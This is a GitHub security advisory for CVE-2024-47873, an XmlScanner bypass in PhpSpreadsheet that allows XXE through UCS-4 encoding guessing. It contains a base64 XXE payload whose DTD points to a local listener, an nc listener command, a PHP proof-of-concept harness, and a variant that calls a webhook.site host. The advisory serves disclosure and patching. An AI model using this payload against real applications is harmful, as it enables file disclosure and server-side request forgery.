ghsa-jw4x-v69f-hh5w
Vulnerability from github
Published
2024-11-18 20:01
Modified
2024-11-18 20:01
Summary
XmlScanner bypass leads to XXE
Details

Summary

The XmlScanner class has a scan method which should prevent XXE attacks.

However, the regexes used in the scan method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.

Details

The scan method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the toUtf8 method. Then, the scan method uses a regex which would also work with 16-bit encoding.

However, the regexes from the findCharSet method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.

A payload for the workbook.xml file can for example be created with CyberChef&input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.). If you open an Excel file containing the payload from the link above stored in the workbook.xml file with PhpSpreadsheet, you will receive an HTTP request on 127.0.0.1:12345. You can test that an HTTP request is created by running the nc -nlvp 12345 command before opening the file containing the payload with PhpSpreadsheet.

PoC

  • Create a new folder.
  • Run the composer require phpoffice/phpspreadsheet command in the new folder.
  • Create an index.php file in that folder with the following content: ```PHP <?php require 'vendor/autoload.php';

use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Xlsx;

$spreadsheet = new Spreadsheet();

$inputFileType = 'Xlsx'; $inputFileName = './payload.xlsx';

/ Create a new Reader of the type defined in $inputFileType / $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType); / Advise the Reader that we only want to load cell data / $reader->setReadDataOnly(true);

$worksheetData = $reader->listWorksheetInfo($inputFileName);

foreach ($worksheetData as $worksheet) {

$sheetName = $worksheet['worksheetName'];

echo "

$sheetName

"; / Load $inputFileName to a Spreadsheet Object / $reader->setLoadSheetsOnly($sheetName); $spreadsheet = $reader->load($inputFileName);

$worksheet = $spreadsheet->getActiveSheet(); print_r($worksheet->toArray());

} `` - Run the following command:php -S 127.0.0.1:8080- Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file, which contains a payload similar to the payload from the details section, but with the URLhttps://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50ainstead of thehttp://127.0.0.1:12345/ext.dtd` URL, in the folder and open https://127.0.0.1:8080 in a browser. You will see an HTTP request on https://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a.

Impact

An attacker can bypass the sanitizer and achieve an XXE attack.

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0"
            },
            {
              "fixed": "3.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47873"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-18T20:01:20Z",
    "nvd_published_at": "2024-11-18T17:15:11Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks.\n\nHowever, the regexes used in the `scan` method and the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method can be bypassed by using UCS-4 and encoding guessing as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\n\n### Details\nThe `scan` method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the [`toUtf8` method](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L76).\nThen, the `scan` method uses a [regex](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L79) which would also work with 16-bit encoding.\n\nHowever, the regexes from the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\nA payload for the `workbook.xml` file can for example be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text(\u0027UTF-32BE%20(12001)\u0027)\u0026input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.).\nIf you open an Excel file containing the payload from the link above stored in the `workbook.xml` file with PhpSpreadsheet, you will receive an HTTP request on `127.0.0.1:12345`. You can test that an HTTP request is created by running the `nc -nlvp 12345` command before opening the file containing the payload with PhpSpreadsheet.\n\n### PoC\n\n- Create a new folder.\n- Run the `composer require phpoffice/phpspreadsheet` command in the new folder.\n- Create an `index.php` file in that folder with the following content:\n```PHP\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Xlsx;\n\n$spreadsheet = new Spreadsheet();\n\n$inputFileType = \u0027Xlsx\u0027;\n$inputFileName = \u0027./payload.xlsx\u0027;\n\n/**  Create a new Reader of the type defined in $inputFileType  **/\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType);\n/**  Advise the Reader that we only want to load cell data  **/\n$reader-\u003esetReadDataOnly(true);\n\n$worksheetData = $reader-\u003elistWorksheetInfo($inputFileName);\n\nforeach ($worksheetData as $worksheet) {\n\n$sheetName = $worksheet[\u0027worksheetName\u0027];\n\necho \"\u003ch4\u003e$sheetName\u003c/h4\u003e\";\n/**  Load $inputFileName to a Spreadsheet Object  **/\n$reader-\u003esetLoadSheetsOnly($sheetName);\n$spreadsheet = $reader-\u003eload($inputFileName);\n\n$worksheet = $spreadsheet-\u003egetActiveSheet();\nprint_r($worksheet-\u003etoArray());\n\n}\n```\n- Run the following command: `php -S 127.0.0.1:8080`\n- Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file, which contains a payload similar to the payload from the details section, but with the URL `https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50a` instead of the `http://127.0.0.1:12345/ext.dtd` URL, in the folder and open \u003chttps://127.0.0.1:8080\u003e in a browser. You will see an HTTP request on \u003chttps://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a\u003e.\n\n### Impact\nAn attacker can bypass the sanitizer and achieve an [XXE attack](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).\n",
  "id": "GHSA-jw4x-v69f-hh5w",
  "modified": "2024-11-18T20:01:20Z",
  "published": "2024-11-18T20:01:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jw4x-v69f-hh5w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47873"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php"
    },
    {
      "type": "WEB",
      "url": "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing"
    },
    {
      "type": "WEB",
      "url": "https://www.w3.org/TR/xml/#sec-guessing-no-ext-info"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XmlScanner bypass leads to XXE"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.